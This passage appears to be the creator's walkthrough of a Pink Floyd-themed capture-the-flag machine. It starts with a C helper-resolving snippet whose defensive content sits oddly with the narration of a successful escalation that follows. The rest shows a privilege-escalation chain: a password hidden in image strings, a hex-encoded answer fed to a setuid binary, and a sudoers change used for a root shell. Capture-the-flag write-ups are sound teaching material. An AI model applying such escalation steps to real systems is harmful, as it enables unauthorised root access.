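    for (size_t i = 0; i < sizeof TRUSTED_DIRS / sizeof TRUSTED_DIRS[0]; i++) {
        char path[4096];
        struct stat st;
        int n = snprintf(path, sizeof path, "%s/%s", TRUSTED_DIRS[i], cmd);
        if (n < 0 || (size_t)n >= sizeof path) return -1;
        if (stat(path, &st) != 0 || !S_ISREG(st.st_mode)) continue;
        if (st.st_mode & S_IWOTH) continue;          /* world-writable helper: refuse it */
        if (access(path, X_OK) != 0) continue;
        if (strlen(path) + 1 > outsz) return -1;
        strcpy(out, path);
        return 0;
    }
    return -1;
}

/* Returns 1 if cmd resolves to exactly `expect` (handy for checks and tests). */
int resolves_to(const char *cmd, const char *expect)
{
    char path[4096];
    return resolve_trusted(cmd, path, sizeof path) == 0 && strcmp(path, expect) == 0;
}

/* Run a trusted helper with no shell and a fixed, minimal environment.
 * Returns the child's exit status, or -1 if it could not be resolved or run. */
int run_trusted(const char *cmd)
{
    char path[4096];
    if (resolve_trusted(cmd, path, sizeof path) != 0) return -1;
    char *const argv[] = { path, NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Don't hand the helper a split real/effective uid like shineon did. */
        if (setuid(geteuid()) != 0) _exit(127);
        execve(path, argv, envp);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char path[4096];
    if (resolve_trusted("mail", path, sizeof path) == 0)
        printf("mail resolves to %s, exit status %d\n", path, run_trusted("mail"));
    else
        puts("no trusted mail binary found; refusing to run one from PATH");
    return 0;
}
```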
Success… almost. We have DavidGilmour as our effective uid, but our real uid and groups are still RichardWright’s, so we’re not fully David yet. Let’s take a look around David’s home directory and see what we can find. First up, another bio.. did you really expect anything less? No real hints in the file. Let’s take a look at the profile pic:
Nothing obvious looking at the photo. Let’s look a little closer:
```
$ strings david_gilmour_profile_pic.jpg
JFIF
Ducky
zhttp://ns.adobe.com/xap/1.0/
<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.352624, 2008/07/30-18:05:41 ">
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:Iptc4xmpCore="http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/"
---snip---
7OnN}
Nn_}
^=>W
{w|6
Om?OoA
who_are_you_and_who_am_i
```
Gotcha! A readable string sitting at the tail of the image data. Let’s presume that this is David’s password and actually log in as David:
```
$ login
login: DavidGilmour
Password:
$ whoami;id
DavidGilmour
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)
```
Wish You Were Here, don’t you? ;) Let’s keep moving on.. we have to be getting close now. Note the group memberships: daemon, www and welcometothemachine. In David’s home directory is a file called anotherbrick.txt:
```
$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review: pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
```
A new website… good stuff! Only one thing to do.. browse away:
Taking a look at the site doesn’t reveal any obvious hints. Let’s take a look at the source and headers before proxying through Burp:
```
root@omerta:~# curl -i -A "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" http://192.168.240.157/pinkfloyd1965newblogsite50yearscelebration-temp/index.php
HTTP/1.1 200 OK
Connection: keep-alive
Content-type: text/html; charset=UTF-8
Date: Sat, 28 Nov 2015 09:40:42 GMT
Server: OpenBSD httpd
Transfer-Encoding: chunked
X-Powered-By: PHP/5.6.11
---snip---
```
“Can you see what the Dog sees?” Let’s grab the front page image and take a closer look:
We can barely make out some sort of text where the dog is looking. Fire up GIMP and let’s take a better look with “hints of lightness”:
By adjusting the brightness and contrast, we can make out two strings:
/welcometothemachine
50696e6b466c6f796435305965617273
Looks like another MD5? Passing this through hashcat, and also checking with MD5 Online, doesn’t come up with any result. Taking a closer look, it is 32 characters drawn only from 0-9 and a-f, which is just as consistent with plain hex-encoded text as with a hash:
```
root@omerta:~# echo 50696e6b466c6f796435305965617273 | xxd -r -p;echo
PinkFloyd50Years
```
“Come on, you target for far away laughter” .. that was just a bit cruel. Let’s see what /welcometothemachine is:
```
$ find / -name "welcometothemachine" 2>/dev/null
/var/www/htdocs/welcometothemachine
$ cd /var/www/htdocs/welcometothemachine/
$ ls -al
total 24
drwxr-xr-x  2 root  welcometothemachine   512 Aug  8 00:33 .
drwxr-x---  4 www   welcometothemachine   512 Nov 27 01:47 ..
-rws--s---  1 root  welcometothemachine  7513 Nov 27 01:47 PinkFloyd
$ file PinkFloyd
PinkFloyd: writable, executable, regular file, no read permission
```
A setuid-root binary that our welcometothemachine group can execute but not read. Let’s execute it:
```
$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces

Answer: AAAA

Denied.... If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
```
Due to the permissions on the file (execute only, no read) we are unable to run strings on the binary, or even scp/transfer it to our attacking machine for further analysis. Let’s try the password we found:
```
$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces

Answer: PinkFloyd50Years

Denied.... If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
```
No good. After a little bit of stuffing around, I decided to try the actual hex string:
```
$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces

Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted. You can now set your controls to the heart of the sun!
```
W00t!!!! It doesn’t look like anything has changed at the command prompt, so let’s check whether the setuid binary altered any files after we entered the correct string:
```
$ find / -mmin -10 -type f 2>/dev/null
/home/DavidGilmour/.ssh/known_hosts
/etc/sudoers
---snip---
```
Ha! Sudoers. “Without a thought of the consequence, I gave into my decadence.”
```
$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL
bash-4.3# whoami;id;uname -a
root
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
OpenBSD thewall.localdomain 5.8 GENERIC#1066 i386
```
The binary granted DavidGilmour unrestricted sudo, so a quick sudo to a root shell is all that’s left. This is it! The Final Cut! Let’s raise the flag!
If you had a crack at solving The Wall, I hope you enjoyed the challenge. I had a great time creating it. :)
Big shoutout to @rastamouse and @thecolonial for being test bunnies; appreciate your help guys.
@vulnhub; thank you so much for hosting these challenges for us all!
.. and last but not least, Syd Barrett (RIP), Nick Mason, Roger Waters, Richard Wright (RIP), and David Gilmour. Thank you for 50 years of absolutely amazing tunes… rock on!!!
Until next time, tight lines and happy hacking.